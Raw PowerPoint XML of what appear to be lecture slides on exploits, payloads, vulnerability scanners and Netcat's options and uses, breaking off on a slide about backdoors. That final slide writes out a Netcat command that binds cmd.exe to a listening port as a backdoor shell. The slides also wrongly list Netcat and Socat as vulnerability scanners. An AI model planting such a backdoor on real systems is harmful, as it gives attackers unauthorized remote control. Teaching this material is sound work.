                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is an exploit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To take advantage of a vulnerability, we often need an exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit is a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This may be in the form of a system crash, denial of service, buffer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   overflow, a blue screen of death, or the system being unresponsive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits often deliver a payload to the target system to grant the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   attacker access to the system.</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anose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is a payload?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> A payload is the piece of software which give provision to control a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    computer system after it is being exploited.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The payload is typically attached to an exploit and gets delivered in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    to the system.</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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1691005"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit’s most popular payload is called Meterpreter, which enables us to do all sorts of stuff on the target system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, we can upload and download files from the system, take screenshots, and password hashes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can even take over the screen, mouse, and keyboard to fully control the computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can even turn on a laptop’s webcam.</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NETWORKS VULNERABILITY SCANNING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A network vulnerability scanner is a software tool that scans an </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  entire network and its nodes for security vulnerabilities and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  loopholes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A network security scanner is primarily used by network </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   administrators to evaluate a network's security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A network security scanner scans all known and possible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   vulnerabilities and threats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BB7CCC-0F84-E66D-9F97-C9D9AD939CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{72A9C0CF-0642-6A78-0D2B-5C5ADD556B50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It scans all devices including Routers, Servers, Firewalls, Client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   computers etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It checks for vulnerabilities such as: Password strength, Open </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   ports, Scripts, Operating system controls etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> After analysis scanners provide reports that includes information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   about IT assets, associated vulnerabilities, Prioritized threats, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   Percentage of risk vulnerability etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples of Network Vulnerability Scanner </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Socat</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27905483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Need of Vulnerability Scanner </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a:t>Functions of vulnerability scanning are far different from firewall or intrusion detection system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability scanning tools helps in protecting an organization from any kind of security risks or threats by scanning with deep inspection of endpoints to ensure that they are configured securely and correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The prime aim of running a vulnerability scanner is identify the devices that are open for vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network vulnerability scanner, Host based vulnerability scanner, application security scanner, Database security scanner etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Netcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a wonderfully versatile tool which has been dubbed the “Swiss army knife”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a computer networking utility designed to read and write data across both TCP and UDP network connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This dual functionality suggests that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> runs in two modes and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is designed to be a dependable “back end” device that can be used candidly or easily driven by other programs and scripts.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It is a feature-rich network debugging and investigation tool since </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   it can produce almost any kind of connection its user could need.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modern Unix-based systems include Netcat as part of their default </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   command set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Its list of features includes port scanning, transferring files, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   port listening, and it can be used as a backdoor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Netcat works with several options.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However, the following is a common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [options] [target system] [remote port]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where target system is the hostname or IP address to connect to and remote port is either a single port, a port range, or individual ports separated by spaces, depending on the desired behavior.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Classifications of Vulnerability scanners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerability originates from three sources Vendor-originated:This includes software bugs, missing operating system patches,  vulnerable  services,  insecure  default  configurations,  and  web application vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System administration-originated:This includes incorrect or unauthorized system configuration changes, lack of password protection policies, and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>User-originated:This   includes   sharing   directories   to   unauthorized parties,  failure  to  run  virus  scanning  software,  and  malicious  activities, such as deliberately introducing system backdoors.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Command-Line options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This option tells the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to be in listen mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> This binds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to a local port to await incoming TCP connections, making it act as a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shifts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from default TCP mode to UDP mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to bind to a UDP port instead of a TCP port.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-e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This tells what operation to perform after a successful connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This option causes a listening </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to execute command any time when someone makes a connection on the port to which it is listening.</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-p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to mention port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-z </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to send only enough data to discover which ports are </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        open.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to provide detailed reports, otherwise it reports only the data it receives.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a:t>-i </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> It specifies the delay interval that Netcat waits between sending </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Tells Netcat to forego hostname lookups and if we use this option, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we must specify an IP address instead of a hostname.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Specifies the source IP address Netcat should use when making its</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   connections.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Uses of Netcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used for many purposes. It has a number of built-in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   capabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform basic Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It can Create a backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obtain Remote Access to a Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform port listening and redirection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</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Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Netcat can be used to transfer files between systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Data transfer can be done in two ways. From a listener to client or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  client to listener</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Perform Basic Port Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It can perform simple port scans to easily identify open ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is done by specifying a range of ports to scan, along with the -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   z option to perform a scan instead of attempting to initiate a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   connection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The basic command line for Netcat is nc [options] host ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   Here host represents the hostname or IP address to which the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   connection is to be done.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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Relays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Netcat can be configured to bounce an attack from machine to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    machine.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Create a backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Netcat’s most popular use by malicious users is to create a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   backdoor login shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This simple script below will create a backdoor. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>At listener: nc –l –p 1234 –e cmd.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
